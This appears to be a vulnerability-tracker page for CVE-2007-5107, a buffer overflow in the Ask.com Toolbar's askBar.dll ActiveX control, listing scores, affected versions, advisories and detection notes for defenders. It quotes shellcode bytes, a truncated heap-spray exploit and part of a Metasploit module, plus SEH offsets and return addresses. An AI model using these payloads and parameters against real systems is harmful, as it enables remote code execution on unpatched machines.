CVE-2007-5107
published 2007-09-26CVE-2007-5107: Stack-based buffer overflow in the AskJeevesToolBar.SettingsPlugin.1 ActiveX control in askBar.dll in IAC Search & Media ask.com Ask Toolbar 4.0.2.53 and…
PriorityP346critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
35.86%
98.3th percentile
Stack-based buffer overflow in the AskJeevesToolBar.SettingsPlugin.1 ActiveX control in askBar.dll in IAC Search & Media ask.com Ask Toolbar 4.0.2.53 and earlier allows remote attackers to execute arbitrary code via a long ShortFormat property value. NOTE: some of these details are obtained from third party information. NOTE: the researcher claims that this is the same as CVE-2007-5108, but there is insufficient detail for CVE-2007-5108 to be certain.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ask.com | ask_toolbar | <= 4.0.2.53 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063
- →Detect exploitation attempts targeting the AskJeevesToolBar.SettingsPlugin.1 ActiveX control via an overly long ShortFormat property value set in JavaScript (e.g., `vname.ShortFormat = strname` where strname is a large string). ↗
- →The exploit uses a heap-spray technique with a NOP sled targeting address 0x0d0d0d0d; monitor for large JavaScript heap allocations combined with ActiveX instantiation of AskJeevesToolBar.SettingsPlugin.1. ↗
- →SEH-based overflow: the Metasploit module uses generate_seh_payload with a return address overwrite at offset 2876 (XP SP0/SP1) or 1716 (Win2000). Detect abnormally long ShortFormat property strings in HTML pages instantiating the askBar.dll ActiveX control. ↗
- →Payload bad characters for this exploit are null byte, tab, newline, carriage return, single quote, and backslash: \x00\x09\x0a\x0d'\ — shellcode in the wild will avoid these bytes. ↗
- ·The vulnerability affects Ask Toolbar version 4.0.2.53 and earlier only; later versions are not affected. ↗
- ·The return addresses (ROP/SEH gadgets) are version- and OS-specific: 0x71aa32ad for Windows XP SP0/SP1 English and 0x75022ac4 for Windows 2000 Pro English ALL; detections relying on these exact values will not generalize across other OS versions. ↗
- ·The researcher notes this CVE may overlap with CVE-2007-5108, but there is insufficient detail to confirm they are the same vulnerability. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-v682-76g4-2gwm: Stack-based buffer overflow in the AskJeevesToolBar
ghsa_unreviewed·2022-05-01·CVSS 10.0
CVE-2007-5107 [CRITICAL] CWE-119 GHSA-v682-76g4-2gwm: Stack-based buffer overflow in the AskJeevesToolBar
Stack-based buffer overflow in the AskJeevesToolBar.SettingsPlugin.1 ActiveX control in askBar.dll in IAC Search & Media ask.com Ask Toolbar 4.0.2.53 and earlier allows remote attackers to execute arbitrary code via a long ShortFormat property value. NOTE: some of these details are obtained from third party information. NOTE: the researcher claims that this is the same as CVE-2007-5108, but there is insufficient detail for CVE-2007-5108 to be certain.
GHSA
GHSA-gv44-wp79-c9g9: Unspecified vulnerability in IAC Search & Media ask
ghsa_unreviewed·2022-05-01·CVSS 9.3
CVE-2007-5108 [CRITICAL] GHSA-gv44-wp79-c9g9: Unspecified vulnerability in IAC Search & Media ask
Unspecified vulnerability in IAC Search & Media ask.com toolbar has unknown impact and remote attack vectors. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine. NOTE: this might be the same issue as CVE-2007-5107.
No detection rules found.
Exploit-DB
Ask.com Toolbar - 'askBar.dll' ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2007-5107 Ask.com Toolbar - 'askBar.dll' ActiveX Control Buffer Overflow (Metasploit)
Ask.com Toolbar - 'askBar.dll' ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: ask_shortformat.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Ask.com Toolbar 4.0.2.53.
An attacker may be able to excute arbitrary code by sending an overly
long string to the "ShortFormat()" method in askbar.dll.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revis
Exploit-DB
Ask.com/AskJeeves Toolbar Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow
exploitdb·2007-09-24
CVE-2007-5108 Ask.com/AskJeeves Toolbar Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow
Ask.com/AskJeeves Toolbar Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow
---
// This is new technique I invent call 'heap fill attack'
var str0ke = 0x0d0d0d0d;
var sucks = unescape( // Launch the system calculator 100 times because what else?
// This code currently not work on Solaris/Sparc
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
"%uFF57%u63E7%u6C61%u0063");
var dick = 0x400000;
var j0hnson = sucks.length
Metasploit
Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow
metasploit
Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow
Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Ask.com Toolbar 4.0.2.53. An attacker may be able to execute arbitrary code by sending an overly long string to the "ShortFormat()" method in askbar.dll.
No writeups or analysis indexed.
http://secunia.com/advisories/26960http://www.foxitsoftware.com/pdf/reader/security.htmhttp://www.securityfocus.com/archive/1/480459/100/0/threadedhttp://www.securityfocus.com/bid/25785http://www.vupen.com/english/advisories/2007/3265https://exchange.xforce.ibmcloud.com/vulnerabilities/36757https://www.exploit-db.com/exploits/4452http://secunia.com/advisories/26960http://www.foxitsoftware.com/pdf/reader/security.htmhttp://www.securityfocus.com/archive/1/480459/100/0/threadedhttp://www.securityfocus.com/bid/25785http://www.vupen.com/english/advisories/2007/3265https://exchange.xforce.ibmcloud.com/vulnerabilities/36757https://www.exploit-db.com/exploits/4452
2007-09-26
Published